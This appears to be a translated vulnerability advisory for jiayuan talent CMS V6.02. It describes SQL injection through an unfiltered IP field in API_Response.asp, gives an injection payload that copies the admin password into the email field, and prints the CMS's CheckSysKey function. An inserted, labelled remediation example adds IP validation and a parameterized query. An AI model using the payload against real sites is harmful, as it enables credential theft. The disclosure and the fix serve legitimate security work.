Vulnerability Author: phantom spring [B.S.N]
Vulnerability Source: http://www.hacker.com.cn
Download source code.
Program version: jiayuan talent CMS system V6.02 (I tested only 6.02; test older versions yourself.)
Vulnerability level: high
Vulnerability description:
/API/API_Response.asp
The injection vulnerability occurs because the IP address is written to the database in an update without being filtered.
There are many access restrictions, but you can test with the following code.
Code:
, Member_email = dFirst (JOB_pass, JOB_admin), Member_url = aaa
In this way, the password is written into the email field.
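One way to close this hole, shown as an added example that is not the CMS's own code: validate the IP value strictly and pass it to the database as a bound parameter, so it can never extend the SET clause. The function names, the table JOB_member and the columns Member_ip and Member_name are hypothetical, and conn is assumed to be an already open ADODB.Connection.

```vbscript
' Added example. Names marked (hypothetical) are assumptions, not CMS source.
Option Explicit

Const adCmdText = 1
Const adParamInput = 1
Const adVarChar = 200
Const adExecuteNoRecords = 128

' Accept only a dotted-quad IPv4 address with every octet in 0-255.
' Anything else (commas, spaces, "=", SQL fragments) is rejected outright.
Function IsValidIPv4(ipText)
    Dim re, parts, i
    IsValidIPv4 = False
    If IsNull(ipText) Then Exit Function
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,3}(\.[0-9]{1,3}){3}$"
    If Not re.Test(ipText) Then Exit Function
    parts = Split(ipText, ".")
    For i = 0 To 3
        If CInt(parts(i)) > 255 Then Exit Function
    Next
    IsValidIPv4 = True
End Function

' Store the IP through a parameterized command. Returns False, without
' touching the database, when the value is not a valid IPv4 address.
Function UpdateMemberIp(conn, memberName, ipText)
    Dim cmd
    UpdateMemberIp = False
    If Not IsValidIPv4(ipText) Then Exit Function   ' reject, do not try to "clean"
    Set cmd = CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' JOB_member, Member_ip and Member_name are (hypothetical) names.
    cmd.CommandText = "UPDATE JOB_member SET Member_ip = ? WHERE Member_name = ?"
    ' Parameters are bound by position; the values are sent as data, not SQL text.
    cmd.Parameters.Append cmd.CreateParameter("ip", adVarChar, adParamInput, 15, ipText)
    cmd.Parameters.Append cmd.CreateParameter("name", adVarChar, adParamInput, 50, memberName)
    cmd.Execute , , adExecuteNoRecords
    UpdateMemberIp = True
End Function
```

With this check in place, the test string shown above fails validation and the update is never issued.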
To analyze this vulnerability, you also need to analyze the following code.
Code:
Function CheckSysKey(iName, iSysKey) ' e.g. username = huanquan, syskey
    ' If either value is empty, end the call.
    If IsNull(iName) Or iName = "" Or IsNull(iSysKey) Or iSysKey = "" Then
        CheckSysKey = False
        Exit Function
    End If
    ' If the syskey is 32 characters long, keep the 16 characters starting at position 9.
    If Len(iSysKey) = 32 Then
        iSysKey = Mid(iSysKey, 9, 16)
    End If
    Dim strFRKey, strFRKeyNew
    strFRKey = Md5(iName & API_SysKey, 16)    ' baf588a6ba715854
    strFRKeyNew = Md5(iName & API_SysKey, 16) ' baf588a6ba715854
    ' The comparison is case-insensitive.
    If LCase(iSysKey) = LCase(strFRKey) Or LCase(iSysKey) = LCase(strFRKeyNew) Then
        CheckSysKey = True
    Else
        CheckSysKey = False
    End If
End Function
I will only introduce the vulnerability exploitation code. You can view the program on your own.